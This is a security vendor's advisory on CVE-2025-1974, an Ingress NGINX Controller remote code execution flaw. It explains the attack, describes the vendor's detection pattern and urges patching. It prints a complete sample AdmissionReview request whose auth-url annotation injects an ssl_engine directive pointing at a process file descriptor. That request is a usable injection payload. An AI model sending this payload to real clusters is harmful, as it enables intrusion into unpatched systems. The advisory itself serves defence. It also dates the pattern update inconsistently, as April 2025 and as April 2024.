[2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution
This is an RCE vulnerability in the Ingress NGINX controller that could allow an attacker to attempt to execute malicious commands by sending an AdmissionReview request with a crafted, temporary NGINX configuration template.
This vulnerability was patched in Ingress NGINX Controller versions 1.12.1, 1.11.5, and AIWAF responded by adding patterns to detect these vulnerabilities in the April 2025 pattern update.
1. Overview
The Ingress NGINX Controller is one of the Ingress Controllers used by Kubernetes, which is responsible for routing incoming traffic from the outside to the relevant Kubernetes services based on certain rules.
This report summarizes our analysis of a recent RCE vulnerability in this Ingress Controller, CVE-2025-1974.
Source : https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
2. Attack Type
CVE-2025-1974 is a remote code execution vulnerability that leverages a structural flaw in the Ingress NGINX Controller to allow an attacker to execute malicious commands by sending an AdmissionReview request to the Ingress NGINX Controller with a crafted temporary NGINX settings template to the Admission Controller, which determines whether incoming requests from the outside should be authorized.
The attacker performs an RCE attack by first sending a request to the Ingress NGINX Controller's Pod file system with a Content-Length that is manipulated to be larger than the actual malicious file size to trick it into opening a file descriptor, and then sending an AdmissionReview request to the Admission Controller to access that file descriptor.
Source : https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
Example attack Request :
POST /test/path HTTP/1.1
Content-Length: 1897
Content-Type: application/json
Host: www.test.com
User-Agent: HTTPie
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "85b707bf-4241-4f9b-9ee8-7809c7132cdc",
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"requestKind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"requestResource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"name": "xxx",
"namespace": "default",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "60a7a2da-f9ec-4afc-baaa-11bf648233a8"
},
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "xxx",
"namespace": "default",
"creationTimestamp": null,
"annotations": {
"nginx.ingress.kubernetes.io/auth-url": "http://example.com/#;}}}\n\nssl_engine /proc/30/fd/10;\n\n"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "xxx.yoshino-s.xyz",
"http": {
"paths": [
{
"path": "/",
"pathType": "Prefix",
"backend": {
"service": {
"name": "xxx",
"port": {
"number": 5244
}
}
}
}
]
}
}
]
},
"status": {
"loadBalancer": {}
}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
3. Response
Kubernetes has released version-specific internal patches for CVE-2025-1974, so users of those controllers should check their Ingress NGINX Controller versions and patch to at least the specific version for each version.
Our AIWAF product responds via pattern 2256: Kubernetes ingress-nginx Remote Code Execution, which is part of the April 2024 pattern update.
Source : https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/
4. Conclusion
Kubernetes is an open source container orchestration platform used globally and is the leading platform for managing and deploying large numbers of containers, so the impact of this vulnerability is high and it is critical to patch to the latest version quickly.
Our AIWAF product has developed a pattern of response to vulnerabilities within Kubernetes and will continue to respond quickly to related vulnerabilities as they are discovered.
